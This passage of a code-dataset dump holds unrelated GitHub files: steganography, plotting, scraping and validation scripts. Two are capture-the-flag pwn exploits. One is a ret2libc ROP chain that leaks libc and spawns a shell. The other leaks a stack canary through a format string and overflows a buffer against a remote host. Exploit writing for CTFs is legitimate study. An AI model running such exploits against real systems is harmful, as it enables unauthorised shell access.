fignuj.savefig(savepath+\"NeuronPullCurve_\"+str(s1)+\"_\"+str(s2)+\".jpg\", bbox_inches='tight', dpi=75)\r\n\r\n d.append({'Timestamp' : str(s1)+\"_\"+str(s2),\r\n 'SS Force' : ssrelF[0],\r\n 'Pk Force' : relFmax,\r\n })\r\n \r\n plt.close('all')\r\n\r\n n = n + 1\r\nForceDat = pd.DataFrame(d)\r\n\r\nprint('Data analysed!')","repo_name":"mchughj33/mem-tension","sub_path":"cellForce_analyser_neuron_v3.py","file_name":"cellForce_analyser_neuron_v3.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"26981301645","text":"#!/usr/bin/env python\n\"\"\"\nBPCS Steganography: encoding/decoding messages hidden in a vessel image\n\nSource: http://web.eece.maine.edu/~eason/steg/SPIE98.pdf\n\nBEHAVIORS:\n encoding\n * expects a vessel image file, message file, and alpha value\n * hides the contents of a file inside a vessel image\n decoding\n * expects a vessel image file, and alpha value\n * recovers the message stored inside a vessel image\n capacity\n * expects a vessel image file and alpha value\n * assesses the maximum size of a message that could be encoded within the vessel image\n test\n * runs the unit tests\n\n\"\"\"\nimport os.path\nimport argparse\n\nfrom .bpcs_steg_decode import decode\nfrom .bpcs_steg_encode import encode\nfrom .bpcs_steg_capacity import capacity\nfrom .bpcs_steg_test import test_all\n\n__author__ = \"Jay Hennig\"\n__license__ = \"MIT\"\n__email__ = \"mobeets@gmail.com\"\n\nparser = argparse.ArgumentParser()\n\nvalid_opt_behaviors = {\n 'encode': ['infile', 'messagefile', 'alpha'],\n 'decode': ['infile', 'outfile', 'alpha'],\n 'capacity': ['infile', 'outfile', 'alpha'],\n 'test': []\n }\n\nparser.add_argument('behavior', type=str, help='interaction modes: {0}'.format(valid_opt_behaviors.keys()))\nparser.add_argument('-i', '--infile', type=str, help='path to vessel image (.png)')\nparser.add_argument('-o', '--outfile', type=str, help='path to write output file')\nparser.add_argument('-m', '--messagefile', type=str, help='path to message file')\nparser.add_argument('-a', '--alpha', type=float, help='complexity threshold', default=0.45)\nopts = parser.parse_args()\n\ndef check_file_exists(filename):\n if not os.path.exists(filename):\n parser.error('The file \"{0}\" could not be found.'.format(filename))\n\nif opts.behavior == 'decode':\n check_file_exists(opts.infile)\n decode(opts.infile, opts.outfile, opts.alpha)\nelif opts.behavior == 'encode':\n check_file_exists(opts.infile)\n check_file_exists(opts.messagefile)\n encode(opts.infile, opts.messagefile, opts.outfile, opts.alpha)\nelif opts.behavior == 'capacity':\n check_file_exists(opts.infile)\n capacity(opts.infile, alpha=opts.alpha, outfile=opts.outfile)\nelif opts.behavior == 'test':\n test_all()\n","repo_name":"mobeets/bpcs","sub_path":"bpcs/bpcs.py","file_name":"bpcs.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"68"} +{"seq_id":"17533558899","text":"import pytest\n\n\n@pytest.fixture(scope='session')\ndef setup():\n \"\"\"\n There is no setup required for the server 'reqres' as these are opensource API.\n But just for future enhancements keeping this setup file in the conftest.\n \"\"\"\n print(\"Started the execution..\")\n base_url = \"https://reqres.in/api/users\"\n yield\n print(\" Automation execution is completed..!\")\n","repo_name":"mayursonawane051/API-_using_the_Pytest_framework","sub_path":"reqres/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25729321851","text":"from jsonschema import validate, ValidationError\nfrom datetime import datetime\n\ndef str2date(date_string):\n # e.g. date_string -- 2014-10-28T00:00:00Z\n return datetime.strptime(date_string, '%Y-%m-%dT%H:%M:%SZ')\n\nscpp_schema = {\n \"type\" : \"object\",\n \"properties\" : {\n \"customerId\" : {\"type\" :\"string\"},\n \"startTime\" : {\"type\" : \"string\"},\n \"endTime\" : {\"type\":\"string\"},\n \"volume\" : {\"type\":\"number\"}\n }\n }\n\ndef validate_scpp_msg(scpp_msg):\n \"\"\"Validate an scpp msg according to the json schema and common sense (start date < end date)\"\"\"\n\n validate(scpp_msg, scpp_schema)\n startTime = str2date(scpp_msg[\"startTime\"])\n endTime = str2date(scpp_msg[\"endTime\"])\n if startTime >= endTime:\n raise ValidationError(\"Start time {0} should be before end time {1}\".format(scpp_msg[\"startTime\"], scpp_msg[\"endTime\"]))\n\ntariff_schema = {\n \"type\" : \"object\",\n \"properties\" : {\n \"startFee\": {\"type\" : \"number\"},\n \"hourlyFee\": {\"type\" : \"number\"},\n \"feePerKWh\": {\"type\" : \"number\"},\n \"activeStarting\": {\"type\" : \"string\"}\n }\n }\n\ndef validate_tariff_msg(tariff_msg, last_active_starting):\n \"\"\"Validate a tariff msg according to 1) the json schema \n 2) tariff's active starting ts > last active starting ts\n 3) tariff's active starting ts must be in the future\n \"\"\"\n\n validate(tariff_msg, tariff_schema)\n if last_active_starting is not None and last_active_starting >= tariff_msg['activeStarting']:\n raise ValidationError(\"activeStarting {0} is before last tariff's active starting date {1}!\"\n .format(tariff_msg['activeStarting'], last_active_starting))\n if str2date(tariff_msg['activeStarting']) < datetime.now():\n raise ValidationError(\"activeStarting {0} cannot be before current time!\"\n .format(tariff_msg['activeStarting'], last_active_starting))\n\n","repo_name":"goroglev/Levente-Karoly-Gorog","sub_path":"Backoffice client-server python/app/json_schemas.py","file_name":"json_schemas.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25766008128","text":"from pwn import *\nfrom warnings import filterwarnings\n\n# Allows you to switch between local/GDB/remote from terminal\ndef start(argv=[], *a, **kw):\n if args.GDB: # Set GDBscript below\n return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)\n elif args.REMOTE: # ('server', 'port')\n return remote(sys.argv[1], sys.argv[2], *a, **kw)\n else: # Run locally\n return process([exe] + argv, *a, **kw)\n\n# Specify GDB script here (breakpoints etc)\ngdbscript = '''\ninit-pwndbg\nbreakrva 0x000000000000133b\ncontinue\n'''.format(**locals())\n\n# Binary filename\nexe = './simpler_patched'\nelf = context.binary = ELF(exe, checksec=False)\ncontext.log_level = 'info'\nfilterwarnings(\"ignore\")\n\n# ===========================================================\n# EXPLOIT GOES HERE\n# ===========================================================\n\nio = start()\nlibc = elf.libc\n\n# ===========================================================\n# Leak ELF Section\n# ===========================================================\n\nio.recvuntil('here:')\nio.sendline('sh'+'a'*29)\nio.recvuntil('a\\n')\nleak = unpack(io.recv()[:6].ljust(8, b\"\\x00\"))\nelf.address = leak - (0x557c0d4a2221- 0x557c0d4a1000)\nlog.info(\"Leaked Address: %#x\", leak)\nlog.info(\"ELF Base Address: %#x\", elf.address)\n\n# ===========================================================\n# ELF Gadgets\n# ===========================================================\n\npop_rdi = elf.address + 0x00000000000011ee # pop rdi; ret; \nxor_rsi = elf.address + 0x00000000000011f0 # xor rsi, rsi; ret; \nxor_rdx = elf.address + 0x00000000000011f4 # xor rdx, rdx; ret; \npop_rax = elf.address + 0x00000000000011ec # pop rax; ret; \nret = elf.address + 0x000000000000101a # ret; \nsyscall = elf.address + 0x00000000000011e9 # syscall; ret; \n\n# ===========================================================\n# Ret2Libc\n# ===========================================================\n\noffset = 56\n\npayload = flat({\n offset:[\n elf.sym['notcalled'],\n pop_rdi,\n elf.got['printf'],\n elf.plt['printf'],\n elf.address + 0x1231\n ]\n})\n\nio.sendline(payload)\n# io.recv()\nprintf = unpack(io.recv()[:6].ljust(8, b\"\\x00\"))\nlibc.address = printf - libc.sym['printf']\ninfo(\"Leaked Printf Address: %#x\", printf)\ninfo(\"Libc Base Address: %#x\", libc.address)\n\nsh = next(libc.search(b'/bin/sh\\x00'))\nsystem = libc.symbols['system']\ninfo('/bin/sh: %#x', sh)\ninfo('system: %#x', system)\n\npayload = flat({\n offset: [\n elf.sym['notcalled'],\n pop_rdi,\n sh,\n system\n ]\n})\n\nio.sendline('a')\nio.sendline(payload)\nio.interactive()\n","repo_name":"h4ckyou/h4ckyou.github.io","sub_path":"posts/ctf/cyberlympics22/prequal/Robin/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"4851707297","text":"# Transfer changedon/timestamp to datetime.\r\n# According to datetime, write each record that belongs to a specific minute to a file named as month+day+hour+minute.\r\n\r\nimport os\r\nimport json\r\nimport datetime\r\nimport multiprocessing\r\n\r\ndef perminute(i,):\r\n with open(\"split/\"+i) as f:\r\n a = f.readlines()\r\n for line in a:\r\n data = json.loads(line)\r\n temp = {}\r\n temp[\"hmacaddress\"] = data[\"hmacaddress\"]\r\n temp[\"building\"] = data[\"building\"]\r\n temp_json = json.dumps(temp)\r\n temp_line = str(temp_json)+\"\\n\"\r\n\r\n ts = int(data[\"changedon\"]) + 36000\r\n dateArray = datetime.datetime.fromtimestamp(ts)\r\n filename = dateStr[5:7]+dateStr[8:10]+dateStr[11:13]+dateStr[14:16]\r\n\r\n with open('PerMinute/'+filename, 'a') as o:\r\n o.writelines(temp_line)\r\n\r\n\r\npool = multiprocessing.Pool(8)\r\n\r\ndic = (os.listdir(\"split\"))\r\nfor file in dic:\r\n pool.apply_async(perminute, (file,))\r\n\r\npool.close()\r\npool.join()\r\n","repo_name":"ylli1/wifitrack-project","sub_path":"PerMinutePerFile.py","file_name":"PerMinutePerFile.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73517694938","text":"import tensorflow as tf\nfrom tensorflow.python.keras.losses import binary_crossentropy\n\n\n### LOSS FUNCTIONS ###\n\n\ndef dice_coeff(y_true, y_pred):\n smooth = 1.\n # Flatten\n y_true_f = tf.reshape(y_true, [-1])\n y_pred_f = tf.reshape(y_pred, [-1])\n intersection = tf.reduce_sum(y_true_f * y_pred_f)\n score = ((2. * intersection + smooth) /\n (tf.reduce_sum(y_true_f) + tf.reduce_sum(y_pred_f) + smooth))\n return score\n\n\ndef dice_loss(y_true, y_pred):\n loss = 1 - dice_coeff(y_true, y_pred)\n return loss\n\n\ndef bce_dice_loss(y_true, y_pred):\n loss = binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred)\n return loss\n","repo_name":"cmalinmayor/baby_fork","sub_path":"build/lib/baby/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1125056673","text":"import sys\nimport os\n\nimport gen_graphs as gg\nfrom recast_base import *\n\n\nif __name__ == '__main__':\n # these are hardcoded info\n # you don't need to change them\n python_file = 'gen_graphs.py'\n p_rnd = [1e-2, 1e-3, 1e-4, 1e-5, 1e-6,]\n\n # python src/gen_graphs.py filename\n if (len(sys.argv) < 2):\n s = 'python recast_edgelist.py trace'\n sys.exit (s)\n\n filename = sys.argv[1]\n path = os.path.split(filename)[0]\n trace_name = os.path.split(filename)[1].split('.')[0]\n \n sys.argv = [python_file, filename]\n\n gg.main()\n\n ep = get_ep(gg)\n random_ep = get_random_ep(gg)\n to = get_to(gg)\n random_to = get_random_to(gg)\n\n (friends, bridges, acquaintance, random) = map_relations(ep, random_ep, to, random_to, p_rnd)\n\n folder = 'recast_class' + os.sep + trace_name\n folder_images = 'images' + os.sep + 'recast' + os.sep + trace_name + os.sep\n\n if not os.path.exists(folder):\n os.makedirs(folder)\n if not os.path.exists(folder_images):\n os.makedirs(folder_images)\n \n plot_clustering(gg.temporal_graphs,\n gg.random_graphs,\n fname=folder_images + os.sep + 'cc.eps',\n name=trace_name)\n plot_ep(ep, random_ep, fname=folder_images + os.sep + 'ep.eps', trace_name=trace_name)\n plot_to(to, random_to, fname=folder_images + os.sep + 'to.eps', trace_name=trace_name)\n plot_relations(p_rnd, friends, bridges, acquaintance, random, fname=folder_images + os.sep + 'rel.eps', \n trace_name=trace_name)\n\n save_edges(gg, ep, random_ep, to, random_to, p_rnd, fname= folder + os.sep, ext='.txt')\n","repo_name":"guilhermeleobas/recastd","sub_path":"python/recast_edgelist.py","file_name":"recast_edgelist.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"32881351212","text":"import requests\nfrom bs4 import BeautifulSoup\n\nheaders = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'}\ndef last_so_page(url):\n result = requests.get(url,headers = headers)\n soup = BeautifulSoup(result.text,'html.parser')\n pages = soup.find('div',{'class':'s-pagination'}).find_all('a',{'class':'s-pagination--item'})\n max_page = pages[-2].get_text(strip=True)\n return max_page\n\ndef get_so_job(soup):\n info_dict = []\n item_box = soup.find('div', {'class': 'listResults'}).find_all('div', {'class': 'd-flex'})\n for item in item_box:\n url = \"https://stackoverflow.com/jobs/\"\n dict = {}\n title = item.find('a',{'s-link stretched-link'})\n name = item.find('h3', {'class': 'fc-black-700 fs-body1 mb4'})\n links = item.find('div')\n try:\n titles = title.text\n link = url + links['data-jobid']\n companies, location = name.find_all('span', recursive=True)\n company_name = companies.get_text(strip=True)\n location_name = location.get_text(strip=True)\n dict = {'title':titles,\n 'comapny':company_name,\n 'location':location_name,\n 'link':link}\n info_dict.append(dict)\n except:\n pass\n return info_dict\n\n\ndef extract_so_jobs(last,url):\n jobs = []\n for i in range(1,int(last)+1):\n result = requests.get(f\"{url}&pg={i+1}\",headers=headers)\n soup = BeautifulSoup(result.text, 'html.parser')\n jobs_info = get_so_job(soup)\n for job in jobs_info:\n jobs.append(job)\n return jobs\n\ndef get_so_jobs(word):\n url = f\"https://stackoverflow.com/jobs?r=true&q={word}\"\n last_page = last_so_page(url)\n jobs = extract_so_jobs(last_page,url)\n return jobs","repo_name":"ankiyong/MultiScrapper","sub_path":"so.py","file_name":"so.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14714522417","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\n\n# Load the 'tips' dataset from Seaborn\ndf = sns.load_dataset('tips')\n\n# Basic info\ndf.info()\n\n# Descriptive statistics\ndf.describe()\n\n# Check for missing values\ndf.isnull().sum()\n\n# Pairplot to visualize relationships\nsns.pairplot(df, hue=\"time\") # 'time' is a column in the 'tips' dataset\nplt.show()\n\n# Select only numeric columns for correlation heatmap\nnumeric_cols = df.select_dtypes(include=['float64', 'int64'])\nplt.figure(figsize=(10, 8))\nsns.heatmap(numeric_cols.corr(), annot=True, cmap='coolwarm')\nplt.show()\n","repo_name":"nogibjj/levia_colab_week9","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29969431714","text":"#!/usr/bin/env python\n# vim: set ts=4 sw=4 tw=0 et pm=:\nimport sys\nimport math\nimport numpy\nimport os.path\nimport re\nimport getopt\nimport time\nfrom functools import partial\nimport matplotlib.pyplot as plt\nimport threading\nimport time\n\ndef normalize(v):\n m = max(v)\n return [x/m for x in v]\n\nclass PeakHold(object):\n def __init__(self, fft_size, use_8bit=False, verbose=False):\n self._slice_size=fft_size\n self._fft_size=self._slice_size\n\n if use_8bit:\n self._struct_elem = numpy.uint8\n self._struct_len = numpy.dtype(self._struct_elem).itemsize * self._slice_size *2\n else:\n self._struct_elem = numpy.complex64\n self._struct_len = numpy.dtype(self._struct_elem).itemsize * self._slice_size\n\n self._window = numpy.blackman(self._fft_size)\n self.peaks = numpy.array([-100000000]*self._fft_size)\n\n def _fft(self, slice, fft_len=None):\n if fft_len:\n fft_result = numpy.fft.fft(slice, fft_len)\n else:\n fft_result = numpy.fft.fft(slice)\n\n fft_result = numpy.fft.fftshift(fft_result)\n return fft_result/len(slice)\n\n\n def process_file(self, file_name):\n with open(file_name, \"rb\") as f:\n f.read(self._struct_len)\n while True:\n data = f.read(self._struct_len)\n if not data: break\n if len(data) != self._struct_len: break\n\n slice = numpy.frombuffer(data, dtype=self._struct_elem)\n if self._struct_elem == numpy.uint8:\n slice = slice.astype(numpy.float32) # convert to float\n slice = (slice-127.35)/128. # Normalize\n slice = slice.view(numpy.complex64) # reinterpret as complex\n \n spectrum = self._fft(slice, self._fft_size)\n mag = spectrum\n mag = numpy.abs(spectrum)**2\n #print max(numpy.abs(slice)), max(mag)\n mag = 10*numpy.log10(mag)\n self.peaks = numpy.maximum(self.peaks, mag)\n\ndef plot_peaks(data):\n plt.ion()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_ylim([-80,-20])\n time.sleep(1)\n l, = ax.plot(data.peaks, )\n while 1:\n l.set_ydata(data.peaks)\n fig.canvas.draw()\n time.sleep(1)\n \nif __name__ == \"__main__\":\n fft_size = int(sys.argv[1])\n verbose = False\n file_name = \"/dev/stdin\"\n d = PeakHold(fft_size=fft_size, use_8bit=False, verbose=verbose)\n drawer = threading.Thread(target=plot_peaks, args=[d])\n drawer.setDaemon(True)\n drawer.start()\n\n d.process_file(file_name)\n while True:\n time.sleep(1)\n\n","repo_name":"muccc/iridium-toolkit","sub_path":"rtl-sdr/rtl-peak-hold.py","file_name":"rtl-peak-hold.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":438,"dataset":"github-code","pt":"68"} +{"seq_id":"36473746808","text":"### Export only\n### Exports the current Streams7 video as TIFF files\n### Author: Emmett Krupczak using code borrowed from Levi (\"SPythonTestMultiCamsStartTimeScript\")\n### 14 Jun 2017\n\nimport SPython\n\nexportPath = \"C:\\\\StreamsExportTest2\\\\VideoExportTest\\\\\"\n\ndef groupDevices():\n \"\"\"\n From Levi's code.\n Get the handle for all devices in the system.\n The 0, 0 means we are not looking for a device in any\n particular movie or scene. Just devices in the main\n Streams device list. Each new video device will be\n added to a video device list. \n \n Returns this video device list\n \"\"\"\n vidDevList = [] # make an empty list\n GPSDev = 0\n hDev = sFindFirstDevice(0, 0)\n while hDev:\n curType = sGetDeviceDataType(hDev, 0)\n devName = sGetName(hDev)\n if curType == tdVIDEO:\n vidDevList.append(hDev)\n print('Found video device ' + devName)\n if curType == tdGPS:\n GPSDev = hDev\n print('Found GPS device ' + devName)\n hDev = sFindNextDevice()\n\n # Select all the video devices found above.\n sdErr = sSelectDevice(vidDevList[0], 1)\n for i in range(1, len(vidDevList)):\n sdErr = sSelectDevice(vidDevList[i], 0)\n\n # print all video devices selected\n for i in range(0, len(vidDevList)):\n if sIsDeviceSelected(vidDevList[i]):\n print('Device ' + sGetName(vidDevList[i]) + ' selected for video')\n\n # Group all selected devices\n gsdErr = sGroupSelectedDevices('VideoGroup')\n return vidDevList\n\ndef getActive(verbose = True):\n \"\"\"\n verbose = True: Prints active movie and scene name\n returns movie name, scene name\n \"\"\"\n activeScene = sGetActiveScene()\n activeMovie = sGetActiveMovie()\n if verbose: \n print(\"Scene: \"+sGetSceneName(activeScene))\n print(\"Movie: \"+ sGetMovieName(activeMovie))\n return sGetMovieName(activeMovie), sGetSceneName(activeScene)\n\ndef exportScene(vidDevList, exportPath, fileType = \"TIFF\"):\n \"\"\"\n From Levi's code.\n Exports current scene as TIFF files to location given by exportPath\n \"\"\"\n hExport = sFindInstalledFilterByName(ftFILE, fileType)\n\n # make a word with flags for exporting. This is done by\n # XORing the various desired flags together. In this\n # case there will be a new file for each frame, and the\n # export progress meter will show.\n exportFlags = EXPORT_SEPARATE_FILES_PER_FRAME | EXPORT_SHOW_PROGRESS_METER\n\n expMovieName, expSceneName = getActive(verbose = False)\n print('Start Export: ' + sGetTimeString(sGetCurrentTime()))\n for i in range(0, len(vidDevList)):\n expDevName = sGetName(vidDevList[i])\n expFName = exportPath + expMovieName + '_' + expSceneName + '_' + expDevName + '_'\n print(expFName)\n eErr = sExport([vidDevList[i]], hExport, expFName, xmENTIRE_SCENE, exportFlags)\n print('End Export: ' + sGetTimeString(sGetCurrentTime()))\n\ndef main():\n print(\"Running video export test script.\")\n vidDevList = groupDevices()\n print(\"Devices identified and grouped\")\n getActive()\n exportScene(vidDevList, exportPath)\n\nif __name__ == \"__main__\":\n main()","repo_name":"emmettk/pvrsex","sub_path":"VideoExportTest.py","file_name":"VideoExportTest.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19945149344","text":"from math import sqrt\n\ndef check_prime(a):\n if a < 2:\n return 0\n for i in range(2, int(sqrt(a))+1):\n if a % i == 0:\n return 0\n return 1\n\n_ =input()\na = map(int, input().split())\ncnt = 0\nfor i in a:\n if check_prime(i) == 1:\n cnt += 1\nprint(cnt)","repo_name":"jj150618/Algorithm","sub_path":"Python/백준/단계별 풀어보기/8.기본 수학 2/1978_소수 찾기.py","file_name":"1978_소수 찾기.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74293251095","text":"#!/usr/bin/python3\n\nimport string\n\nfile = 'code/romeo-full.txt'\ntry:\n fd = open(file)\nexcept:\n print('There is not such a file %s.' % (file))\n exit()\n\nDict = dict()\nfor line in fd:\n line = line.lower()\n for letter in line:\n if not letter.isalpha() : continue\n Dict[letter] = Dict.get(letter, 0) + 1\n\nlst = list()\nfor key, val in Dict.items():\n lst.append(( val, key ))\n\nlst.sort(reverse=True)\n\nfor val, key in lst:\n print('%s: %s' % (key, val))\n\nfd.close()\n","repo_name":"iliyahoo/pythonlearn","sub_path":"10-3.py","file_name":"10-3.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39495636255","text":"import setuptools\n\nwith open(\"README.md\", 'rt') as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"db-join\",\n version=\"0.1.8\",\n author=\"Frey Waid\",\n author_email=\"logophage1@gmail.com\",\n description=\"NoSQL db join\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license=\"MIT license\",\n url=\"https://github.com/freywaid/db-join\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n install_requires=['dotted-notation>=0.6.0',],\n)\n","repo_name":"freywaid/db-join","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"757113096","text":"from pwn import *\ncontext.log_level='debug'\nio=process('./binary_200')\nio=remote('172.104.78.53',22002)\n# elf=ELF('./binary_200')\npay='%15$p'\nio.sendline(pay)\nio.recv(2)\ncanary=int(io.recv(8),16)\npay='a'*0x28+p32(canary)+'a'*8+p32(0)+p32(0x0804854d)\nio.sendline(pay)\nio.interactive()","repo_name":"ilovekeer/Buuoj-Pwn","sub_path":"qwb2019/day18/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"68"} +{"seq_id":"24857748334","text":"import heapq\n\ndef get_prim_mst(graph):\n # for a connected component\n # assume nodes labeled 0 to n - 1\n max_value = 1000000000000 # some large number\n mst = []\n start_vertex = list(graph.keys())[0]\n spinned_vertices = set([start_vertex])\n weights = [max_value for el in graph]\n weights[start_vertex] = 0\n parents = [None for el in graph]\n for (vertex, weight) in graph[start_vertex]:\n weights[vertex] = weight\n parents[vertex] = start_vertex\n vertices_heap = [(weight, vertex) for (vertex, weight) in graph[start_vertex]]\n heapq.heapify(vertices_heap)\n while len(spinned_vertices) < len(graph):\n (weight, new_vertex) = heapq.heappop(vertices_heap)\n # can have multiple instances for one vertex in the heap => need to do the check\n while new_vertex in spinned_vertices:\n weight, new_vertex = heapq.heappop(vertices_heap)\n spinned_vertices.add(new_vertex)\n mst.append(((parents[new_vertex], new_vertex), weight))\n for (v, w) in graph[new_vertex]:\n if v not in spinned_vertices:\n if w < weights[v]:\n weights[v] = w\n parents[v] = new_vertex\n heapq.heappush(vertices_heap, (w, v))\n return mst\n\ndef test_get_prim_mst():\n graph = {0: [(1, 1), (2, 8), (3, 2)],\n 1: [(4, 6)],\n 2: [(4, 1)],\n 3: [(2, 3)],\n 4:[]}\n assert get_prim_mst(graph) == [((0, 1), 1), ((0, 3), 2), ((3, 2), 3), ((2, 4), 1)]\n graph1 = {0:[(1, 5), (3, 1)],\n 1: [(0, 5), (3, 2), (2, 6)],\n 2: [(1, 6), (3, 10), (4, 7)],\n 3: [(0, 1), (1, 2), (2, 10), (4, 2)],\n 4: [(2, 7), (3, 2)]}\n assert get_prim_mst(graph1) == [((0, 3), 1), ((3, 1), 2), ((3, 4), 2), ((1, 2), 6)]\n\nif __name__ == \"__main__\":\n test_get_prim_mst()\n","repo_name":"MarinaSergeeva/Algorithms","sub_path":"day21_prim_mst.py","file_name":"day21_prim_mst.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13811900987","text":"# importing tensorflow for using CNN and ImageDataGenerator class from keras for preprocessing input data\r\nimport tensorflow as tf\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\n# preprocessing training data by augmanting data(for avoiding overfiting) and loading the train data in batche of 32 images\r\n\r\ntrain_datagen=ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True\r\n)\r\ntrain_set=train_datagen.flow_from_directory(\r\n 'Section 40 - Convolutional Neural Networks (CNN)/dataset/training_set',\r\n target_size=(64,64),\r\n batch_size=32,\r\n class_mode='binary'\r\n)\r\n\r\n# preprocessing test data by augmanting data(for avoiding overfiting) and loading the test data in batches of 32 images\r\ntest_datagen=ImageDataGenerator(\r\n rescale=1./255)\r\ntest_set=test_datagen.flow_from_directory(\r\n 'Section 40 - Convolutional Neural Networks (CNN)/dataset/test_set'\r\n ,target_size=(64,64),\r\n batch_size=32,\r\n class_mode='binary'\r\n)\r\n\r\n\r\n# initializing convolution neural network object\r\ncnn=tf.keras.models.Sequential()\r\n\r\n# convolution layer\r\ncnn.add(tf.keras.layers.Conv2D(filters=32,kernel_size=3,activation='relu',input_shape=[64,64,3]))\r\n\r\n# pooling layer\r\ncnn.add(tf.keras.layers.MaxPool2D(pool_size=2,strides=2))\r\n\r\n# adding second convolution and pooling layer\r\ncnn.add(tf.keras.layers.Conv2D(filters=32,kernel_size=3,activation='relu'))\r\ncnn.add(tf.keras.layers.MaxPool2D(pool_size=2,strides=2))\r\n\r\n#flattening the poolmap\r\ncnn.add(tf.keras.layers.Flatten())\r\n\r\n# adding full connection layer\r\ncnn.add(tf.keras.layers.Dense(units=128,activation='relu'))\r\n\r\n#adding ouput layer\r\ncnn.add(tf.keras.layers.Dense(units=1,activation='sigmoid'))\r\n\r\n#compiling the cnn (brain)\r\ncnn.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\r\n\r\n#training on train_set\r\ncnn.fit(x=train_set,validation_data=test_set,epochs=2)\r\n\r\n# making a single prediction\r\nimport numpy as np\r\nfrom keras.preprocessing import image\r\ntest_image=image.load_img('Section 40 - Convolutional Neural Networks (CNN)/dataset/test_set/cats/cat.4937.jpg',target_size=(64,64))\r\n# as input is taken in form of array so convert image to array\r\ntest_image=image.img_to_array(test_image)\r\n# as input is taken in batch of 32 so expand the array\r\ntest_image=np.expand_dims(test_image,axis=0)\r\nresult=cnn.predict(test_image)\r\ntrain_set.class_indices\r\nif result[0][0]==1:\r\n prediction='dog'\r\nelse :\r\n prediction='cat'\r\nprint(prediction)\r\n","repo_name":"Manishk2511/ImageClassifierCNN","sub_path":"code/dogORcatCNN.py","file_name":"dogORcatCNN.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"11486299142","text":"class naipe:\n\tdef __init__(self, palo, numero, emoji, t_posicion, e_valor):\n\t\tself.palo = palo\n\t\tself.numero = numero\n\t\tself.emoji = emoji\n\t\tself.t_posicion = t_posicion\n\t\tself.e_valor = e_valor\n\nespada_1 = naipe(\"Espada\", 1, \"espada1\", 1, 1)\nbasto_1 = naipe(\"Basto\", 1, \"basto1\", 2, 1)\nespada_7 = naipe(\"Espada\", 7, \"espada7\", 3, 7)\noro_7 = naipe(\"Oro\", 7, \"oro7\", 4, 7)\nespada_3 = naipe(\"Espada\", 3, \"espada3\", 5, 3)\nbasto_3 = naipe(\"Basto\", 3, \"basto3\", 5, 3)\noro_3 = naipe(\"Oro\", 3, \"oro3\", 5, 3)\ncopa_3 = naipe(\"Copa\", 3, \"copa3\", 5, 3)\nespada_2 = naipe(\"Espada\", 2, \"espada2\", 6, 2)\nbasto_2 = naipe(\"Basto\", 2, \"basto2\", 6, 2)\noro_2 = naipe(\"Oro\", 2, \"oro2\", 6, 2)\ncopa_2 = naipe(\"Copa\", 2, \"copa2\", 6, 2)\noro_1 = naipe(\"Oro\", 1, \"oro1\", 7, 1)\ncopa_1 = naipe(\"Copa\", 1, \"copa1\", 7, 1)\nespada_rey = naipe(\"Espada\", 12, \"espadarey\", 8, 10)\nbasto_rey = naipe(\"Basto\", 12, \"bastorey\", 8, 10)\noro_rey = 